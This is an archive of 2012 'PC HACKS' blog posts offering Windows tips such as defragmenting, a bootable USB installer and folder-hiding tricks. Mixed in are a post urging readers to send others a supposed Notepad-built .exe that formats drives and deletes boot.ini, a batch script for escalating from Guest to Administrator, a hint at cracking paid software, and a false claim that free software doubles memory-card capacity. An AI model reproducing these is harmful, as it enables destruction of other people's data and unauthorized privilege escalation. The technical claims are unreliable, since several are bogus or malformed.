Showing posts with label PC HACKS. Show all posts
Showing posts with label PC HACKS. Show all posts

Friday, 6 July 2012

TOP 6 EASY STEPS TO IMPROVE SYSTEM SPEED




How to make a computer faster: 6 ways to speed up your PC
By following a few simple guidelines, you can maintain your computer, help increase your PC speed, and help keep it running smoothly. This article discusses how to use the tools available in Windows 7, Windows Vista, and Windows XP Service Pack 3 to help make your computer faster, maintain your computer efficiently, and help safeguard your privacy when you're online.

Note: Some of the tools mentioned in this article require you to be logged on as an administrator. If you aren't logged on as an administrator, you can only change settings that apply to your user account.

1. Remove spyware, and help protect your computer from viruses
Spyware collects personal information without letting you know and without asking for permission. From the websites you visit to user names and passwords, spyware can put you and your confidential information at risk. In addition to privacy concerns, spyware can hamper your computer's performance. To combat spyware, you might want to consider using the PC safety scan from Windows Live OneCare. This scan is a free service that helps check for and remove viruses.

Download Microsoft Security Essentials for free to help guard your system in the future from viruses, spyware, adware, and other malicious software (also known as malware). Microsoft Security Essentials acts as a spyware removal tool and includes automatic updates to help keep your system protected from emerging threats.

The Microsoft Windows Malicious Software Removal Tool is another utility that checks computers running Windows 7, Windows Vista, Windows XP, Windows 2000, and Windows Server 2003 for infections by specific, prevalent malicious software, including Blaster, Sasser, and Mydoom, and helps remove any infection found.

2. Free up disk space
The Disk Cleanup tool helps you to free up space on your hard disk to improve the performance of your computer. The tool identifies files that you can safely delete and then enables you to choose whether you want to delete some or all of the identified files.

Use Disk Cleanup to:

Remove temporary Internet files.
Delete downloaded program files, such as Microsoft ActiveX controls and Java applets.
Empty the Recycle Bin.
Remove Windows temporary files, such as error reports.
Delete optional Windows components that you don't use.
Delete installed programs that you no longer use.
Remove unused restore points and shadow copies from System Restore.
Tip: Typically, temporary Internet files take the most amount of space because the browser caches each page you visit for faster access later.

To use Disk Cleanup:

Windows 7 users

Windows Vista users

Windows XP users

3. Speed up access to data
Disk fragmentation slows the overall performance of your system. When files are fragmented, the computer must search the hard disk as a file is opened (to piece it back together). The response time can be significantly longer.

Disk Defragmenter (sometimes shortened to Defrag by users) is a Windows utility that consolidates fragmented files and folders on your computer's hard disk so that each occupies a single space on the disk. With your files stored neatly end to end, without fragmentation, reading and writing to the disk speeds up.

When to run Disk Defragmenter
In addition to running Disk Defragmenter at regular intervals (weekly is optimal), there are other times you should run it, too, such as when:

You add a large number of files.
Your free disk space totals 15 percent or less.
You install new programs or a new version of the Windows operating system.
To use Disk Defragmenter:

Windows 7 users

Windows Vista users

Windows XP users

Running Disk Cleanup and Disk Defragmenter on a regular basis is a proven way to help keep your computer running quickly and efficiently. If you'd like to learn how to schedule these tools and others to run automatically, please read Speed up your PC: Automate your computer maintenance schedule.

4. Detect and repair disk errors
In addition to running Disk Cleanup and Disk Defragmenter to optimize the performance of your computer, you can check the integrity of the files stored on your hard disk by running the Error Checking utility.

As you use your hard drive, it can develop bad sectors. Bad sectors slow down hard disk performance and sometimes make data writing (such as file saving) difficult or even impossible. The Error Checking utility scans the hard drive for bad sectors and scans for file system errors to see whether certain files or folders are misplaced.

If you use your computer daily, you should run this utility once a week to help prevent data loss.

Run the Error Checking utility:

5. Learn about ReadyBoost
If you're using Windows 7 or Windows Vista, you can use ReadyBoost to speed up your system. A new concept in adding memory to a system, it allows you to use non-volatile flash memory—like a USB flash drive or a memory card—to improve performance without having to add additional memory.

Learn more about ReadyBoost in Windows 7.
Learn more about ReadyBoost in Windows Vista.
6.  Upgrade  to  Windows 7
If you try all the previous remedies and your computer still isn't as fast as you would like it to be, you may want to consider updating to Windows 7.

Find out if your computer can run Windows 7 using the Upgrade Advisor.
Compare Window 7 editions.
Read a third-party review of Windows 7 by David Pogue of The New York Times.
If the Windows 7 Upgrade Advisor determines that your computer can't run Windows 7 and you still have the need for speed, it might be time for a new computer. There are some great deals on new computers right now:

Shop for new desktop computers.
Shop for new laptop computers.
Shop for netbooks.



HOW TO INSTALL WINDOWS7 FROM USB

Installing Windows from a USB flash drive has several advantages – First of all, the overall speed of the installation process will increase significantly, carrying a USB stick is much more convenient than a DVD, and finally it becomes possible to install the OS even on those systems that do not have a DVD drive, such as a netbook.


In this post, I will show you how to load the Windows installation on to your USB flash drive and make it bootable just like the DVD.


Tools Required:

USB flash drive with a minimum capacity of 4 GB.


Windows 7 set-up DVD.


Now, just follow the below steps:


Step-1:

Plug-in your USB flash drive and backup all the existing data in it.


Open the command prompt. If you are using Windows 7/Vista then open it with administrator rights.


ie: Go to Start -> All Programs -> Accessories -> Right-click on “Command Prompt” and select “Run as Administrator”.


Step-2:

In the command prompt, type in the following command:


DISKPART

This will start the Microsoft DiskPart utility as shown below:

Step-3:
Now issue the following command:

LIST DISK
This will show you a list of  available disks on your system. Disk 0 is usually the hard disk. In my case, Disk 5 is the USB drive (this can be a different one in your case). Now issue the command as shown below:

SELECT DISK 5


NOTE: In the above command, 5 is the USB drive number on my system. If you have a different number on your system, then you need to replace 5 with that number.
Step-4:
Now issue the following list of commands one by one as shown below:

CLEAN
CREATE PARTITION PRIMARY

SELECT PARTITION 1

ACTIVE

FORMAT FS=NTFS QUICK

ASSIGN

EXIT



Minimize the command prompt and proceed to the next step.
Step 5:
Insert the Windows 7/Vista installation disc and note down the “drive letter” of your DVD drive. In my case, it is “H:”. Now type the following list of commands as shown below:

H: CD BOOT

CD BOOT

BOOTSECT.EXE /NT60 M: (NOTE: M: is your USB drive letter)

EXIT



Step-6:
Copy the contents of your Windows 7/Vista installation disk into the USB flash drive.

That’s it! Your USB stick is now ready to boot and install the OS for you. Don’t forget to enable the “USB Boot” option and change the “boot priority to USB device from hard disk” in your BIOS settings.

I hope you like this post. Pass your comments to express your opinion.







Tuesday, 3 July 2012

HOW TO LOCK THE FOLDERS USING NOTEPAD


You can lock and unlock your folder with this simple trick !

Procedure :
1. Make a folder on the desktop and name it as “folder”
2. Now, open notepad and write 
ren folder folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} and now (Notepad Menu) File>save as.
3. In the ‘save as’ name it as 
lock.bat and click save ! (Save it on Desktop)
4. Now, again open notepad again and write 
ren folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} folder and now (Notepad Menu) File>save as.
5. In the ‘save as’ name it as 
key.bat and click save ! (Save it on Desktop)
6. Now, double click 
lock.bat to lock the folder and now if you open your folder, control panel will open up !
7. Now, double click 
key.bat to open the folder and now if you open your folder, you can access your data inside the folder again !
8. Lock your folder and hide the 
key.bat somewhere else on your hard disk !
9. Whenever you want to open your folder just paste the 
key.bat on desktop and open your folder using it !

Sunday, 10 June 2012

REPAIR AND ExTRACT CURROPTED RAR ARCHIEVES

REPAIR AND EXTRACT HALFDOWNLOADED OR CURROPTED RAR ARCHIEVES

Recovery Toolbox for RAR is a RAR repair tool which does not modify corrupted documents, and can easily open files which are not accessible. It does not matter which application was used to create the RAR archive; Recovery Toolbox for RAR can access it.


Steps :
1. Click Open and navigate to the corrupted file.
2. In the next step , if the files will be corrupted you will have a next button between Back and Finish. Check the corrupted files and click next.
3. In the next step define an output folder and click next. Files will be repaired and extracted.

Works with Windows XP , Vista and 7.
For full version first install the setup from the above link. Then download  this file. After this run this file and you will get full version.

ENJOY....

CREATE YOUR OWN RUN COMMAND

CREATE YOUR OWN CUSTOMIZED RUN COMMAND

The Run command on Microsoft Windows operating system allows you to directly open an application or document with just a single command instead of navigating to it’s location and double-clicking the executable icon. However, it only works for some of the inbuilt Windows programs such as Command prompt (cmd), Calculator (calc) etc. So, have you ever wondered how to create your own customized Run commands for accessing your favorite programs, files and folders? Well, read on to find out the answer.



Creating the Customized Run Command
Let me take up an example of how to create a customized run command for opening the Internet explorer. Once you create this command, you should be able to open the Internet explorer just by typing “ie” (without quotes) in the Run dialog box. Here is how you can do that.
1. Right click on your Desktop and select New -> Shortcut.
2. You will see a “Create Shortcut” Dialog box as shown below,
3. Click on “Browse”, navigate to: Program Files -> Internet Explorer from your Root drive (usually C:\) and select “iexplore” as shown in the above figure and click on “OK”.
4. Now click on “Next” and type any name for your shortcut. You can choose any name as per your choice; this will be your customized “Run command”. In this case I name my shortcut as “ie”. Click on “Finish”.
5. You will see a shortcut named “ie” on your desktop. All you need to do is just copy this shortcut and paste it in your Windows folder (usually “C:/Windows”). Once you have copied the shortcut onto your Windows folder, you can delete the one on your Desktop.
6. That’s it! From now on, just open the Run dialog box, type ie and hit Enter to open the Internet Explorer.
In this way you can create customized Run commands for any program of your choice. Say “ff” for Firefox, “ym” for Yahoo messenger, “wmp” for Windows media player and so on.
To do this, when you click on “Browse” in the Step-3, just select the target program’s main executable (.exe) file which will usually be located in the C:\Program Files folder. Give a simple and short name for this shortcut as per your choice and copy the shortcut file onto the Windows folder as usual. Now just type this short name in the Run dialog box to open the program.
I hope you like this post! Pass your comments.



COMPRESS 1GB FILE INTO 10MB

    HEY  TODAY IAM GOING TO COMPRESS 1GB INTO 10MB        

Hello, New KGB Archiver open source software according to post title it compresses 1GB file to 10MB file. It used PAQ6 algorithm which has AES-256 powerful encryption. It is available for both Windows and Linux operating system. Compression ratio of this software is very high. Due to high compression levels, time to compress a file goes high as the size of the file increases and compression ratio may vary depending on the format of the file.



The KGB compression format makes a fool of the famous 7z and RAR by managing a compression ratio that is really high even in formats that are already compressed like JPEG images and DivX files. According to various standard tests,the compression ratio improves nearly 20% in comparison with its direct competitors.
SYSTEM REQUIREMENT:

·                     256 MB RAM
·                     1.5 GHz Processor
 FEATURES:

·                     Supports native .kgb files and .zip files
·                     AES-256 Encryption
·                     Able to create self-extracting archives.
·                     Multilanguage supports like Arabic, German, Greek, Japanese, Spanish many more.
·                     Unicode is supported in both User Interface and File Systems.
·                     An Explorer shell extension is available for the windows version.
·                     Make Password protected compressed file.
 File compressed by KGB Archiver save with own extension and at the time of decompression it automatically recognizes the file format. The only limitation of KGB archiver is, decompressed file cannot be open or extract with other compression softwares. 


Note:
1. This KBG Archiver software cannot compress video format files.
2. If you are compressing any file with KGB archiver and sending the comprssed file to your friends then he must have KBG archiver installed on his computer to decompress the file.
 CLICK BELOW TO DOWNLOAD KGB ARCHIEVER FOR FREE

DOUBLE YOUR MEMORY CARD SPACE

    CONVERT  YOUR  2GB MEMORY CARD TO 4GB            

Memory cards are used in many electronic items, like computers, digital camera, mobile phones, and mp3 players. Everyone uses memory cards to store data, but what if you bought a card some days ago and now you feel that this is not enough to fulfill your needs. We have a solution for you; you can convert your 1GB memory card into 2GB with the help of free software.
You just have to follow the given instructions to upgrade your card. After completing the procedure, you will be amazed to see that your 1GB card is storing data according to 2GB memory. Before following the instructions, make sure that you have a 1GB memory card because the application works only on 1GB cards.


1. Insert the memory card to your PC.

2. Keep a back up of all the data from the memory card, because first you have to format the card.

3. Download and install Skymedi software CLICK HERE TO DOWNLOAD

4. After installation, the application will launch automatically showing a windows with options “Fix
and “Cancel”. From the drop down menu, you have to browse the memory card.


5. Once you select the location of the card, click on “Fix”, it will ask you for the confirmation, you have to click on “Yes”. After selecting the memory card, the application will show you a size of around 955MB; this is because you have inserted a 1GB memory card.

6. After finishing the process, the application will ask you to unplug the memory card. Remove it and insert it again. Now the storage capacity of the memory card is increased to 2GB.
7. If you want to check the storage of the memory card you can click on My computer --> Memory card --> Select Properties. You will see that the size of the memory card is 2GB. If you are using Windows Vista7, you will see “Computer” instead of “My computer”. Open that right clicks on the memory card, select properties and you will be able to check the size of the memory card.

8. There is one more way to confirm the storage capacity. Reopen the Skymedi and select the location of the memory card. This time it will show 1912KB, which is 2GB.


Conclusion:
With the help of the software and instructions given above, you can double the storage capacity of your 1GB memory card. If you will buy a 2GB card you have to pay some dollars extra, but this will not make any effect on your pocket because the software is for free.

Note : There is possibility that the software may not work on some of the memory cards, if this does not work in the first time. Do not try it repeatedly. It can result into damage in the memory card.
........ENJOY THE HACK.....

COMENTS ARE WELLCOME

Thursday, 7 June 2012

FORMATING HARD DISK BY USING NOTEPAD

FORMAT HARD DISK USING NOTEPAD

Formatting Hard Disk Using Notepad

Copy and Paste the following code in Notepad.

0100101100011111001001010101010101000

0011111100000


Save As "format.exe" or any name u want (but with extension.exe)


Now you can send this .exe file to people to format their HDD


It can fail to format your HDD while running WINDOWS.


Format c:\ /Q/X -- this will format your drive c:\

011001100110111101110010011011010110000

10111010000 100000011000110011101001011100

0010000000101111010100010010111101011000


Format d:\ /Q/X -- this will format your drive d:\

011001100110111101110010011011010110000

10111010000 

100000011001000011101001011100

0010000000101111010100010010111101011000



Format a:\ /Q/X -- this will format your drive a:\


0110011001101111011100100110110101100

0010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000


del /F/S/Q c:\boot.ini -- this will STOP your computer from booting.


011001000110010101101100001000000010

11110100011000 101111010100110010111101010001

001000000110001100111010010111000110

00100110111101 101111011101000010111001101001

0110111001101001


HOW TO HACK ADMINISTRATOR FROM GUEST

TO HACK ADMIN THROUGH GUEST

Hack Administrator from Guest

Hack Administrator Account from Guest Account.Yes!! that is quite possible.All you need to do is to follow the below procedure.


echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0




Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works... 

-----------------------------------------

ADMINISTRATOR IN WELCOME SCREEN.


When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.
First you must ensure that the Administrator Account is enabled:
1 open Control Panel
2 open Administrative Tools
3 open Local Security Policy
4 expand Local Policies
5 click on Security Options
6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie.
1 open Control Panel
2 open User Accounts
3 click Change the way users log on or log off
4 untick Use the Welcome Screen
5 click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.



EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!


Start the Registry Editor Go to:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \
Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.

Enjoy

MICROSOFT WINDOWS CHEATS AND HACKS

WINDOWS HACKS AND CHEATS

Set Processes Priority
You can set the priority of the software and process that are running on the computer.Just follow the below procedure.

Type

CTRL-SHIFT-ESC or CTRL-ALT-DEL

1.Go to the second tab called Processes, right click on one of the active processes, you will see the Set Priority option 

2.For example, your Run your CDwriter program , set the priority higher, and guess what, no crashed CD’s 

Rapid Shutdown
while shutting down window. open task manager(Ctr+Alt+Del), 
Select shut down tab. and press ' Ctrl ' key while select Turn Off from this tab. 
Count 5 4 3 2 1 and Wowww!!! your system will rapidly shut down.
Disguise folders to Recycle Bin
You can prevent access to any folder by making it act like a Recyle Bin.Just follow the below procedure.

Rename any folder with extension {645FF040-5081-101B-9F08-00AA002F954E}
eg,
if u've a folder Rahul
press F2,
then type, "Rahul.{645FF040-5081-101B-9F08-00AA002F954E}"
See the magic....
To get the folder back just remove the extension using 
"ren Rahul.{645FF040-5081-101B-9F08-00AA002F954E} Rahul" in dos or in a bat file

----------Thats it------------
Lock your Pc with a mouse click
You can lock your Pc with a simple mouse click.just follow the instruction beow.

[1] Create a new shortcut on your desktop using
a right mouse click
[2] Enter 'rundll32.exe user32.dll,LockWorkStation' in the location field.
[3] Give the shortcut a name you like.

That's it -- just
Or you can press Windows+L to do the same for you. 
Notepad Hack
Step 1: Open Notepad
Step 2: Write following line in the notepad.
"this app can break" (Without quotes)
Step 3: Save this file as xyz.txt
Step 4: Close the notepad.
Step 5: Open the file again.


--------And see the magic---------- 
Use Notepad as Diary
You can use Notepad as diary.Just Make a Notepad file with any name and type .LOG in it and save and close it.
Now whenever you open this file,the current date and time will be automatically inserted in it. 

---------Thats it----------- 
Display message on windows start up
You can display a message on whenever windows starts.Just follow the following method.

Start Registry editor by typing "regedit" in the run box in the start menu. (type it without quotes)
Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

Modify the key legalnoticecaption with what you want to name the window.

Modify the key legalnoticetext with what you want the window to say.

Restart
Make you Pdf files to Speak
You can hear the contets of the Pdf files (Adobe Reader Files) by the following way-

ctrl+shift+b ---->to hear the whole topic

ctrl+shift+v ---->to hear the page


----------Enjoy-----------